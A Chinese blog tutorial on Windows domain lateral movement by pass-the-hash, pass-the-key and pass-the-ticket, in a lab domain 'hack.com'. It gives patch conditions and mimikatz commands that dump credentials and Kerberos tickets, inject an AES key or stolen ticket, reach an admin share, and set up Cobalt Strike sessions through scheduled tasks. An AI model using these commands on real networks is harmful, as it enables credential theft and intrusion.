内网横向:PTH&PTK&PTT

1.PHT横向

2.PTK横向

3.PTT横向


1.PHT横向:

条件:有管理员的NTLM Hash 并且目标机器开 放445端口

在工作组环境中: Windows Vista 之前的机器,可以使用本地管理员组内用户进行攻击。 WindowsVista 之后的机器,只能是administrator用户的哈希值才能进行哈希传递攻击,其他用户(包括管理员用户但是非administrator)也不能使用哈希传递攻击,会提示拒绝访问。

在域环境中: 只能是域管理员组内用户(可以是域管理员组内非administrator用户)的哈希值才能进行哈希传递攻击,攻击成功后,可以访问域内任何一台机器

目标:通过横向,上线20机器

利用:

1.先抓取密码,得到管理员密码,猜测一波密码复用

2.进行hash传递:

成功以后,会在我们的靶机上弾一个命令框,我们可以通过这个命令框对我们要横向的机器进行操作

3.我们可以传远程执行工具,对交互shell进行操作

查看本地目标机器目录

4.进行CS上线

复制程序:

创建计划任务:

执行计划任务:

成功上线:

2.PTK横向:

WinXP/2003/Vista/2008 ,以及未打 KB2871997 补丁之前的 Win7/2008r2/8/2012,这些环境我们都可以使用NTLM哈希传递

对于8.1/2012r2,安装补丁kb2871997的Win 7/2008r2/8/2012,可以使用AES keys代替NTLM来进行验证

kb2871997补丁:就是禁止本地管理员进行远程连接,这样就无法以本地管理员用户的权限执行wmi、psexec、schtasks、at和访问文件共享。就是防止哈希传递

但是,即使打了补丁,管理员administrator SID500,照样可以用哈希传递

利用条件:

1.抓取的是域内的ase256  

2.存在远程访问的票据

利用:

1.钓鱼上线

2.绕过UAC

3.查看凭证

mimikatz sekurlsa::ekeys

4.传递key

mimikatz sekurlsa::pth /user:administrator /domain:hack.com /aes256:b03fcae60f0b32a105a8082e89a09cd88a5a6c54b0a209caaa9664c6bc223232

5.传递完成以后会在目标机器上弾一个交互shell,在里面写入计划任务即可上线

3.PTT横向

票据传递攻击一般分为两种:

1、自己制作票据(黄金,白银的前提是要拿下域控)

2、传递内存中的票据

1.导出内存中的票据:要想有票,先用域管登录一下才有票

mimikatz "privilege::debug" "sekurlsa::tickets /export"

2.查看导出的票据:

shell dir

3.清除内存中的票据:

shell klist

shell klist purge

mimikatz kerberos::purge

4.将高权限的票据文件注入内存:这样我们就可以绕过AS,直接访问

mimikatz kerberos::ptt [0;1641eb]-2-0-40e10000-Administrator@krbtgt-HACK.COM.kirbi

5.查看是否导入成功:

shell klist

6.访问机器:

dir \\2012-1.hack.com\c$

7.老一套计划任务上线CS

  • 17
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值